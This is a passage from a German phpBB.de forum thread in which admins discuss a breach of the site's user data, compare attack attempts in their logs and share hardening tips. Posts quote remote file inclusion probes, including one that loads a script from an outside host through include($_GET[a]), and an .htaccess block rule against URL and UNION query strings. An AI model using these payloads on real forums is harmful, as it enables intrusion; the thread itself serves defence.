Diskussion zu Benutzerdaten auf phpBB.de ausspioniert

Projekte der phpBB.de-Community und Feedback zu phpBB.de.
JFooty
Ehemaliges Teammitglied
Beiträge: 1868
Registriert: 02.10.2007 11:46

Beitrag von JFooty »

miccom hat geschrieben:Fürs verkaufen der Daten, gehört er aber geteert und gefedert - nicht aber fürs hacken selbst.
Das lässt mich gerade überlegen, was man sonst noch mit solchen Leuten anstellen kann. :roll:
"Wir haben 85793 registrierte Benutzer."
Da sollte ein kräftiger Tritt in den Hintern von jedem registrierten Benutzer genügen. :D
Benutzeravatar
tas2580
Ehemaliges Teammitglied
Beiträge: 3029
Registriert: 01.07.2004 05:42
Wohnort: /home/tas2580
Kontaktdaten:

Beitrag von tas2580 »

djchrisnet hat geschrieben:Mir gehts genauso. 22 Angriffe geloggt seit vorgestern...
//language/lang_german/lang_main_album.php?phpbb_root_path=http://p
Allerdings schon zum scheitern verurteilt, da ein // am Anfang keinen Sinn ergibt -.-
Das sieht mir eher nach einer anderen schon etwas älteren Lücke aus die da versucht wird auszunutzen. Siehe -> http://www.phpbb2.de/ftopic45218.html
Heute ist ein guter Tag um dein Forum zu testen.
Ehemaliger Benutzername: [BTK] Tobi
DerKaffeemann
Mitglied
Beiträge: 81
Registriert: 26.02.2006 05:03
Wohnort: Messestadt Hannover :)
Kontaktdaten:

Beitrag von DerKaffeemann »

Hmm... Sowas kann doch mal passieren.
Das Team von phpbb kann da sicherlich nix für und deshalb muss euch das auch nicht peinlich sein ^^
Die Fehler in sind gewollt, damit die Perfektion des Textes eingegrenzt wird.
Benutzeravatar
mgutt
Mitglied
Beiträge: 2999
Registriert: 31.08.2004 16:44
Wohnort: Hennef
Kontaktdaten:

Beitrag von mgutt »

hoheidt hat geschrieben:
[BTK] Tobi hat geschrieben:Ein Schutz der aber recht gut gegen die meisten Angriffsversuche hilft und unschöne Einträge im Log vermeidet währe wie weiter oben schon gepostet ein Eintrag in der .htaccess, vorausgesetzt der Server unterstützt mod_rewrite

Code: Alles auswählen

RewriteEngine On
RewriteCond %{QUERY_STRING} (.*)=http://(.*) [OR]
RewriteCond %{QUERY_STRING} (.*)=https://(.*) [OR]
RewriteCond %{QUERY_STRING} (.*)=ftp://(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)UNION(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)SQL_INJECTION(.*)
RewriteRule (.*) http://127.0.0.1 [L,R=301]
Das verhindert das Sachen wie domain.tld?mode=http://crackerseite.tld/böses-script.txt aufgerufen und so durch eine Sicherheitslücke ausgeführt werden können. Alle solchen versuche werden einfach zu dem Rechner der versucht hat das aufzurufen zurück geleitet.
Muss der Eintrag nur in die .htaccess im root oder muss so eine .htaccess in jedes Verzeichnis?

Nebenbei: Dieser Thread strotzt nur so vor "Ich will hier raus" und "selber Schuld" und irgendwelchen anderen unproduktiven Beiträgen, die keinem helfen. Das macht es sehr schwer, die Beiträge herauszufiltern, die wirklich nützlich sind. :(
immer in den root, ABER wenn du htaccess in unterverzeichnissen einsetzt, dann gilt die aus dem root nicht mehr. es gilt immer die im verzeichnis. daher sollte man wenn nur htaccess einsetzen, die komplette verzeichnisse sperren oder passwortschutz enthalten. der rest sollte in den root. (das gilt auch für seo mods etc.)
//language/lang_german/lang_main_album.php?phpbb_root_path=http://p
daher sollte man auch seine language ordner per htaccess schützen. ein direkter zugriff auf diese verzeichnisse ist nicht nötig, daher kann das problemlos gemacht werden.
cback hat geschrieben:Ich würde übrigens empfehlen das phpBB DB Backup/Restore Feature aus dem ACP zu werfen. Bei großen Datenbanken arbeitet es ohnehin nicht zuverlässig und im Ernstfall kann man dann wenigstens übers ACP keinen DB Dump ziehen mit den ganzen Userdaten drin. - Man kann natürlich weiterhin schaden anrichten
Darauf will ich mal weiter eingehen. Ich habe eine Testinstallation über dieses Tool zugrunde gerichtet, in dem ich ein UPDATE Script habe laufen lassen, welches alle IDs per Zufall neu zuordnet. Und wenn es einer auf einen abgesehen hat, kann man diese Art von Angriff über mehrere Monate verteilt, also schleichend, durchführen. Da hilft dann auch kein Backup mehr.

Daher wirklich diese Datei komplett löschen, wie ich aber auch schon in diesem Thema aufgeführt hatte:
http://www.phpbb.de/viewtopic.php?p=865920#865920

Gruß
meine Foren: http://www.maxrev.de/communities.htm
Ich kaufe Dein Forum! Angebote bitte an marc at gutt punkt it
Benutzeravatar
cback
Mitglied
Beiträge: 386
Registriert: 18.04.2004 21:35
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

hackepeter13 hat geschrieben:
cback hat geschrieben:Ich stelle seit ein paar Tagen mittels CrackerTracker Log übrigens wieder verstärkte Angriffsversuche auf Knowledge Base Mod und Album Mod bei mir fest. Loginversuche gab es auch nach dem Login-Protection Log aber das wurde relativ schnell aufgegeben.
Ich habe zwar beide Mods (KB und Album) nicht installiert, aber ich stelle ebenfalls über CT fest, das man bei mir in den letzten Wochen versucht hat die Sprachdatei vom Album-Mod aufzurufen oder so.
Jupps bei mir fehlt auch das Album. Das sind meistens die automatisch laufende Scripte die meist über Suchmaschinen nach Foren suchen und dann einfach ihre Batterie an Schwachstellenproben laufen lassen, egal ob die Datei existiert oder nicht. Wenn keine "positive Rückmeldung" kommt probierts das Teil einfach weiter.

Wobei die PW Geschichten garantiert rein gezielt laufende Angriffe waren.

Darauf will ich mal weiter eingehen. Ich habe eine Testinstallation über dieses Tool zugrunde gerichtet, in dem ich ein UPDATE Script habe laufen lassen, welches alle IDs per Zufall neu zuordnet. Und wenn es einer auf einen abgesehen hat, kann man diese Art von Angriff über mehrere Monate verteilt, also schleichend, durchführen. Da hilft dann auch kein Backup mehr.
Nein ich meinte auch nicht das die Leute ein Backup machen, sondern das sie dieses Tool aus ihrem Forum entfernen (wie Du es auch vorschlägst in dem verlinkten Thread), dass im Falle eines Angriffes es eben nicht einfach möglich ist direkt aus dem ACP heraus die DB komplett zu ziehen.
CBACK Software
professionelles Webdesign - PHP Programmierung - Entwicklung von Modifikationen - Forensysteme
hackepeter13
Valued Contributor
Beiträge: 3545
Registriert: 21.04.2004 12:22
Wohnort: Berlin
Kontaktdaten:

Beitrag von hackepeter13 »

Kaum lese ich hier das der Angriff über $_GET ging (wenn ich das richtig verstanden habe), schon sehe ich im meinem CT das heute um 17 Uhr bei mir 4x etwas mit $_GET versucht wurde.

Code: Alles auswählen

name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/
&highlight=%27.include($_GET[a]),exit.%27&a=http://www.bakhshian.ir/language/f.txt???
Sowas lese ich in meinem Log zum ersten Mal.

Könnte das so ein Angriff sein?
Dave
Mitglied
Beiträge: 2085
Registriert: 25.05.2003 15:03
Wohnort: Wuppertal

Beitrag von Dave »

Hi,

Es ging um ein $_GET[] im code nicht in der url :wink: Bei deinem link versucht er über das $_GET['a'] was nachzuladen.

MfG
Dave
djmarten
Mitglied
Beiträge: 8
Registriert: 25.03.2007 21:58
Kontaktdaten:

Beitrag von djmarten »

Wie kann man das eigene Board sichern?
Die Aktivierung von magic_quotes_gpc schaltet zwar das Sicherheitsrisiko aus, ist allerdings nicht der von PHP empfohlene Weg.


Soll heißen ?

man solte lieber magic_quotes_gpc on haben?
magicwizard
Mitglied
Beiträge: 34
Registriert: 10.09.2006 19:05
Wohnort: Zuhause, Wo sonst?
Kontaktdaten:

Beitrag von magicwizard »

achtung! dies heir wurde bestimmt schon gesagt aber ich wollte keine 41 seiten durchlesen!
mgutt hat geschrieben: Zum MD5-String (verschlüsseltes Passwort):
Der MD5-String selber kann bei Passwörtern bis 8 Stellen und wenn dieses Passwort nur kleine Buchstaben und Zahlen enthält innerhalb von ein paar Tagen gehackt werden. Aber der Aufwand rechtfertigt denke ich nicht den Erfolg. Was bringt es schon von einzelnen User das Passwort herauszufinden, außer dieses Passwort wird von dem User auch woanders eingesetzt.

Ich habe selbst mal ein Bruteforce-Script entwickelt, um eine MD5-Datenbank aufzubauen, daher kann ich mit gutem Gewissen sagen, dass bei Sonderzeichen und zusätzlich großen Buchstaben kein Hacker mehr Lust haben dürfte das zu entschlüsseln.
bei 60.000 passwörtern lohnt sich brute-force und vergleich mit wörterbüchern^^
Meine Homepage | Mein Forum

Sonst überall rami
samunai
Mitglied
Beiträge: 6
Registriert: 22.11.2006 18:21

Beitrag von samunai »

Wie hoch ist die Wahrscheinlichkeit, dass man die Passwörter missbrauchen wird?
Also ich habe den gleichen Passwort bei eher unwichtigen Sachen verwendet und der Aufwand, so viele Passwörter zu ändern, ist mir zu viel.

Aber wenn man sagt, dass es sehr wohl kommen wird, dann mach' ich mir die Mühe :)
Antworten

Zurück zu „Community Talk“